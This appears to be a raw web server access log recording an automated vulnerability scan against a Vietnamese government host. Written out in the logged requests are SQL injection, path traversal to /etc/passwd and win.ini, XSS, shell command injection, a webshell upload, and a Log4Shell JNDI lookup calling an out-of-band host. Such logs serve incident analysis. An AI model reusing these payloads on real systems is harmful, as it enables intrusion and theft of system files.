Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 209 2023-10-15 13:51:55 103.153.214.94 POST /index.php q=result&searchfor=advancesearch 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 206 2023-10-15 13:54:14 103.153.214.94 GET /upload/mobile/index.php c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'' 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 203 2023-10-15 13:54:23 103.153.214.94 POST /casmain.xgi - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 202 2023-10-15 14:04:14 103.153.214.94 GET /ReportServer op=fr_server&cmd=sc_getconnectioninfo 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 205 2023-10-15 14:04:21 103.153.214.94 GET /WebReport/ReportServer op=fr_server&cmd=sc_getconnectioninfo 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 201 2023-10-15 14:15:56 103.153.214.94 GET /fpui/jsp/index.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 212 2023-10-15 14:15:59 103.153.214.94 POST /fpui/loginServlet - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 202 2023-10-15 14:17:28 103.153.214.94 GET /index.php s=Admin-Data-down&id=../../Conf/config.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 207 2023-10-15 14:18:19 103.153.214.94 GET /index.php c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df¶m=action=sql%20sql=%27select%20md5(999999999)%27 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 208 2023-10-15 14:26:42 103.153.214.94 POST /login/dologin - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 203 2023-10-15 14:26:48 103.153.214.94 POST /res.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 203 2023-10-15 14:27:05 103.153.214.94 GET /download.php file=/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200 2023-10-15 14:31:43 103.153.214.94 GET /Visitor/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 11 0 204 2023-10-15 14:31:52 103.153.214.94 GET /Visitor/bin/WebStrings.srf file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 8 0 199 2023-10-15 14:32:52 103.153.214.94 GET /Visitor/bin/WebStrings.srf file&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 8 0 205 2023-10-15 14:33:06 103.153.214.94 GET /kvmlm2/index.dhtml fname&language=../../../../../../../../../../etc/passwd%00.jpg&lname&sponsor=gdi&template=11 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 203 2023-10-15 14:35:51 103.153.214.94 GET /index.dhtml sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 205 2023-10-15 14:36:15 103.153.214.94 GET /fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn/admin/ 200 0 0 203 2023-10-15 14:46:13 103.153.214.94 GET /goanywhere/auth/Login.xhtml - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 212 2023-10-15 14:51:52 103.153.214.94 GET /default/en_US/frame.html content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 204 2023-10-15 14:51:58 103.153.214.94 GET /default/en_US/frame.A100.html sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 207 2023-10-15 14:55:01 103.153.214.94 POST /api/system/sessions - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 228 2023-10-15 14:55:12 103.153.214.94 GET /compress.php file=../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 204 2023-10-15 14:59:07 103.153.214.94 POST /cas/fileUpload/upload token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/tvD2P.jsp&name=222" 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 205 2023-10-15 14:59:12 103.153.214.94 GET /cas/js/lib/buttons/tvD2P.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 201 2023-10-15 15:07:31 103.153.214.94 POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 206 2023-10-15 15:07:37 103.153.214.94 POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 200 2023-10-15 15:10:26 103.153.214.94 GET /dgn/dgn_tools/ping.php ipdm=2;id; 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 206 2023-10-15 15:11:20 103.153.214.94 GET /register/toDownload.do fileName=../../../../../../../../../../../../../../windows/win.ini 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 202 2023-10-15 15:11:24 103.153.214.94 GET /register/toDownload.do fileName=../../../../../../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 204 2023-10-15 15:11:48 103.153.214.94 PUT /v1/agent/service/register - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 205 2023-10-15 15:12:01 103.153.214.94 POST /v2/query - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 205 2023-10-15 15:17:33 103.153.214.94 POST /v1/query - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 208 2023-10-15 15:29:55 103.153.214.94 POST /bic/ssoService/v1/applyCT - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 205 2023-10-15 15:31:44 103.153.214.94 GET /manager/radius/server_ping.php ip=127.0.0.1|cat%20/etc/passwd>../../2WfF0bu4enDJjJRvEllwlG5bkrR.txt&id=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 207 2023-10-15 15:31:50 103.153.214.94 GET /2WfF0bu4enDJjJRvEllwlG5bkrR.txt - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 201 2023-10-15 15:32:53 103.153.214.94 POST /fileDownload action=downloadBackupFile 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 208 2023-10-15 15:32:58 103.153.214.94 POST /fileDownload action=downloadBackupFile 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 204 2023-10-15 15:37:27 103.153.214.94 GET /him/api/rest/V1.0/system/log/list filePath=../ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 207 2023-10-15 15:38:15 103.153.214.94 GET /homeautomation_v3_3_2/api.php do=groups/toggle&groupid=1&status=1&redirect=https://interact.sh/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 208 2023-10-15 15:41:23 103.153.214.94 GET /ioffice/prg/set/iocom/ioFileExport.aspx url=/ioffice/web.config&filename=4xEDS.txt&ContentType=application/octet-stream 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 208 2023-10-15 15:43:20 103.153.214.94 POST /ioffice/prg/set/wss/ioAssistance.asmx - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 211 2023-10-15 15:43:26 103.153.214.94 POST /ioffice/prg/set/wss/ioAssistance.asmx - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 203 2023-10-15 15:44:56 103.153.214.94 POST /iOffice/prg/set/wss/udfmr.asmx - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 215 2023-10-15 15:50:18 103.153.214.94 GET /download type=files&filename=../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 204 2023-10-15 15:51:01 103.153.214.94 GET /lib/..../..../..../..../..../..../..../..../etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 205 2023-10-15 15:55:42 103.153.214.94 GET /api/system/deviceinfo - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 219 2023-10-15 15:55:59 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 210 2023-10-15 15:56:34 103.153.214.94 POST /fileDownload action=downloadBackupFile 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 246 2023-10-15 15:56:36 103.153.214.94 POST /fileDownload action=downloadBackupFile 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 201 2023-10-15 15:58:15 103.153.214.94 POST /webmail/basic/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 204 2023-10-15 15:59:07 103.153.214.94 POST /sysShell - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 217 2023-10-15 16:02:22 103.153.214.94 GET /monitoring part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 245 2023-10-15 16:02:34 103.153.214.94 GET /interlib/report/ShowImage localPath=etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205 2023-10-15 16:02:36 103.153.214.94 GET /interlib/report/ShowImage localPath=C:\Windows\system.ini 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 201 2023-10-15 16:04:27 103.153.214.94 POST /ui/api/v1/global-search/builds jfLoader=true 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 203 2023-10-15 16:04:41 103.153.214.94 GET /systemController/showOrDownByurl.do down&dbPath=../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 205 2023-10-15 16:04:44 103.153.214.94 GET /systemController/showOrDownByurl.do down&dbPath=../Windows/win.ini 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 203 2023-10-15 16:05:46 103.153.214.94 GET /index.php option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../etc/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 216 2023-10-15 16:10:30 103.153.214.94 GET /topic/e'"><img+src=x+onerror=alert(2)> - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 204 2023-10-15 16:11:01 103.153.214.94 GET /cgi-bin/cgiServer.exx page=../../../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 203 2023-10-15 16:14:37 103.153.214.94 GET /api/image/cover-upload filename=../appsettings.json 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 0 2 222 2023-10-15 16:15:22 103.153.214.94 POST /http/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 206 2023-10-15 16:17:06 103.153.214.94 POST /http/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 207 2023-10-15 16:17:23 103.153.214.94 POST /dashboard/proc.php type=login 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 203 2023-10-15 16:18:21 103.153.214.94 POST /auth/realms/master/clients-registrations/openid-connect - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 206 2023-10-15 16:20:04 103.153.214.94 GET /appmonitor/protected/selector/server_file/files folder=C://&suffix 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 204 2023-10-15 16:20:04 103.153.214.94 GET /appmonitor/protected/selector/server_file/files folder=/&suffix 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 201 2023-10-15 16:21:08 103.153.214.94 GET /htmltopdf/downfile.php filename=/windows/win.ini 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 207 2023-10-15 16:23:02 103.153.214.94 POST /json-rpc/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 212 2023-10-15 16:24:20 103.153.214.94 POST /sys/ui/extend/varkind/custom.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 205 2023-10-15 16:24:26 103.153.214.94 GET /laravel-filemanager/download working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type&file=passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 202 2023-10-15 16:28:58 103.153.214.94 GET /Business/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 209 2023-10-15 16:30:25 103.153.214.94 POST /ajax.php action=login 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 204 2023-10-15 16:30:26 103.153.214.94 GET /index.php page=home 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 201 2023-10-15 16:33:13 103.153.214.94 POST /index.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 241 2023-10-15 16:33:13 103.153.214.94 POST /lcms/index.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 202 2023-10-15 16:33:16 103.153.214.94 GET /ftb.imagegallery.aspx - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 204 2023-10-15 16:33:20 103.153.214.94 GET /lucees3ezf<img+src=a+onerror=alert('2WfF0mtoEkfdiFExWSf8fz50D3S')>lujb7/admin/imgProcess.cfm - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 205 2023-10-15 16:33:21 103.153.214.94 GET /lucee/lucees3ezf<img+src=a+onerror=alert('2WfF0mtoEkfdiFExWSf8fz50D3S')>lujb7/admin/imgProcess.cfm - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 201 2023-10-15 16:35:23 103.153.214.94 POST /index.php/bbs/index/download url=/etc/passwd&name=1.txt&local=1 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 205 2023-10-15 16:36:26 103.153.214.94 POST /login - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 203 2023-10-15 16:36:29 103.153.214.94 GET /msa/main.xp Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 205 2023-10-15 16:38:30 103.153.214.94 GET /stat.jsp cmd=chcp+437+%7c+dir 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 208 2023-10-15 16:39:14 103.153.214.94 GET /api/geojson url=${jndi:ldap://${:-477}${:-596}.${hostName}.url.ckjv7uic8b6p3donsoogot6n8xu3ahwtu.oast.online} 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 0 2 218 2023-10-15 16:41:28 103.153.214.94 GET /editor_tools/module type=files/admin"><script>alert(document.domain)</script>¶ms=filetype=images 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 205 2023-10-15 16:42:05 103.153.214.94 GET /servlet/taskProc taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 205 2023-10-15 16:42:07 103.153.214.94 GET /MicroStrategy/servlet/taskProc taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 213 2023-10-15 16:42:28 103.153.214.94 GET /include/thumb.php dir=http/.....///.....///config/config_db.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 218 2023-10-15 16:42:30 103.153.214.94 GET /include/thumb.php dir=.....///http/.....///config/config_db.php 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 200 2023-10-15 16:42:32 103.153.214.94 GET /include/thumb.php dir=http\\..\\..\\config\\config_db.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 199 2023-10-15 16:42:45 103.153.214.94 POST /MUP/ - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 bcvt.kontum.gov.vn/MUP 405 0 1 201 2023-10-15 16:42:45 103.153.214.94 GET /file=C:/Windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 205 2023-10-15 16:47:22 103.153.214.94 POST /cgi-bin/login.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 205 2023-10-15 16:52:21 103.153.214.94 GET /webui/ g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd 443 - 193.123.37.162 